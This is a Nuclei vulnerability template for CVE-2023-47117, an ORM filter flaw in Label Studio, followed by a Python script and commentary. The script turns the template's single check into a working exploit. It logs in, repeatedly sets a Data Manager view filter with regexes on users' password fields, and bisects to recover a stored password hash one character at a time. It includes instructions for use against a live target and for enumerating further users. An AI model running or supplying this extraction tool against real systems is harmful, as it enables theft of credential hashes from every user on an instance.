id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a Data Manager filter chain that filters tasks on sensitive fields of every user account on the platform, by following model relations through Django's Object Relational Mapper (ORM). Because the filter decides which tasks the query returns, the result set acts as an oracle, and an attacker can leak these sensitive fields character by character.
  impact: |
    An attacker with any valid account (the template below logs in as an ordinary user) can leak sensitive user information, including password hashes, character by character by chaining Django ORM filters.
  remediation: |
    Upgrade Label Studio to a release that includes the fix for CVE-2023-47117 (see the advisory references).
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.70644
    epss-percentile: 0.98722
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated,vuln

# Task_id is used as the Data Manager view id (/api/dm/views/<id>) and Project_id as the
# project it belongs to. Supply them, together with username and password, with -var,
# e.g. -var task=1 -var project=1 -var username=<email> -var password=<password>.
variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 490a004630440220556df6fda2f8419b80c3ad7d008be0c9f4db257f5b61884d8bfe53649341d80a02200ea902a224daff1cfca74f5c1f0176af6eb6582ece48b8a2aabcd75e770dc144:922c64590222798bb761d5b6d8e72950
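The template stops after a single oracle query: it confirms that the view filter honours `^pbkdf2_sha256\$260000\$`, which fingerprints the flaw but does not show the character-by-character leak the description refers to. The script below is an added example, not part of the template or of Label Studio; it drives the same two requests (PATCH the view filter, then GET the filtered task list) in a loop and reconstructs one stored password hash a character at a time, bisecting the alphabet so each character costs a handful of queries rather than one per candidate. The `LabelStudioOracle` class, its assumption that `/api/tasks` answers with a JSON object carrying a `tasks` list, the `X-CSRFToken` header, and the `KNOWN_PREFIX`/`ALPHABET` constants are this example's own choices; the offline simulation runs against constructed hash strings, not data from any real instance.

```python
"""Character-by-character ORM leak through the Label Studio Data Manager view filter.

Added example, not the template author's or Label Studio's code. The template only
checks that the filter honours a prefix regex; this turns that single check into an
extraction loop. The HTTP side mirrors the template's requests; the response shape
('tasks' list) is an assumption, and the offline simulation uses constructed hashes.
"""
import http.cookiejar
import json
import re
import urllib.parse
import urllib.request

# Relation chain from the template: task -> updated_by -> organisation -> users -> password
FILTER_FIELD = "filter:tasks:updated_by__active_organization__active_users__password"
# Every character that can occur in a Django pbkdf2_sha256 hash string (assumed alphabet)
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=$_"
# Prefix the template's own regex already confirms (Django 3.2 default iteration count)
KNOWN_PREFIX = "pbkdf2_sha256$260000$"


def build_view_body(view_id, project_id, regex):
    """The PATCH body from the template, with the regex value parameterised."""
    item = {"filter": FILTER_FIELD, "operator": "regex", "value": regex, "type": "String"}
    return {
        "id": view_id,
        "data": {"title": "Tasks", "ordering": [], "type": "list", "target": "tasks",
                 "filters": {"conjunction": "or", "items": [item]},
                 "hiddenColumns": {"explore": [], "labeling": []}, "columnsWidth": {},
                 "columnsDisplayType": {}, "gridWidth": 4, "search_text": None},
        "project": str(project_id),
    }


def _extends(oracle, known, chars):
    """Does some row's value start with `known` followed by one of `chars`?"""
    alt = "|".join(re.escape(c) for c in chars)
    return oracle("^" + re.escape(known) + "(?:" + alt + ")")


def next_char(oracle, known, alphabet=ALPHABET):
    """Bisect the alphabet: about log2(len(alphabet)) queries per character instead of
    one per candidate. Returns None when no row extends `known` by one character."""
    cands = list(alphabet)
    if not _extends(oracle, known, cands):
        return None
    while len(cands) > 1:
        half = cands[: len(cands) // 2]
        cands = half if _extends(oracle, known, half) else cands[len(cands) // 2:]
    return cands[0]


def leak_field(oracle, known=KNOWN_PREFIX, alphabet=ALPHABET, max_len=256):
    """Recover one complete value. `oracle(regex)` returns True when at least one task
    survives the view filter, i.e. the regex matched some user's field. With several
    users the walk always follows a prefix that some real row has, so the result is one
    user's actual value, never a blend of several."""
    while len(known) < max_len:
        ch = next_char(oracle, known, alphabet)
        if ch is None:
            if oracle("^" + re.escape(known) + "$"):   # end anchor confirms completeness
                return known
            raise ValueError(f"{known!r} matches but cannot be extended; widen ALPHABET")
        known += ch
    raise ValueError("value exceeds max_len")


def make_simulated_oracle(values):
    """Offline stand-in for the server: answers as the ORM regex filter would."""
    queries = []

    def oracle(regex):
        queries.append(regex)
        return any(re.search(regex, v) for v in values)
    oracle.queries = queries
    return oracle


class LabelStudioOracle:
    """Live oracle: the template's login, then one PATCH (set filter) and one GET
    (did any task survive?) per query. Assumes /api/tasks returns JSON with a 'tasks' list."""

    def __init__(self, base_url, email, password, view_id, project_id):
        self.base, self.view_id, self.project_id = base_url.rstrip("/"), view_id, project_id
        self.jar = http.cookiejar.CookieJar()
        self.http = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.jar))
        page = self.http.open(self.base + "/user/login/").read().decode()
        m = re.search(r'name="csrfmiddlewaretoken" value="([A-Za-z0-9]+)"', page)
        if not m:
            raise RuntimeError("no csrfmiddlewaretoken on the login page")
        form = urllib.parse.urlencode({"csrfmiddlewaretoken": m.group(1), "email": email,
                                       "password": password, "persist_session": "on"}).encode()
        resp = self.http.open(urllib.request.Request(
            self.base + "/user/login/?next=/projects/", data=form,
            headers={"Referer": self.base + "/user/login/"}))
        if "/user/login" in resp.geturl():          # Django re-renders the form on failure
            raise RuntimeError("login failed")

    def __call__(self, regex):
        q = f"?interaction=filter&project={self.project_id}"
        csrf = next((c.value for c in self.jar if c.name == "csrftoken"), "")
        body = json.dumps(build_view_body(self.view_id, self.project_id, regex)).encode()
        self.http.open(urllib.request.Request(
            f"{self.base}/api/dm/views/{self.view_id}{q}", data=body, method="PATCH",
            headers={"Content-Type": "application/json", "X-CSRFToken": csrf}))
        reply = self.http.open(f"{self.base}/api/tasks?page=1&page_size=1&view={self.view_id}{q}")
        return len(json.loads(reply.read()).get("tasks", [])) > 0
```

Against a live target the call is `leak_field(LabelStudioOracle("http://target:8080", email, password, view_id, project_id))`, with the same view and project ids the template takes via `-var`. Each recovered character costs at most eight oracle calls (sixteen requests) with the bisection, against one call per alphabet character for a linear scan, and the escaping produced by `re.escape` is valid in both Python's `re` (SQLite backend) and PostgreSQL's regex dialect. Because the filter path runs through every active user of the organisation with an `or` conjunction, a single walk yields one user's hash without telling you whose it is; enumerating the rest needs an additional exclusion of each value already found.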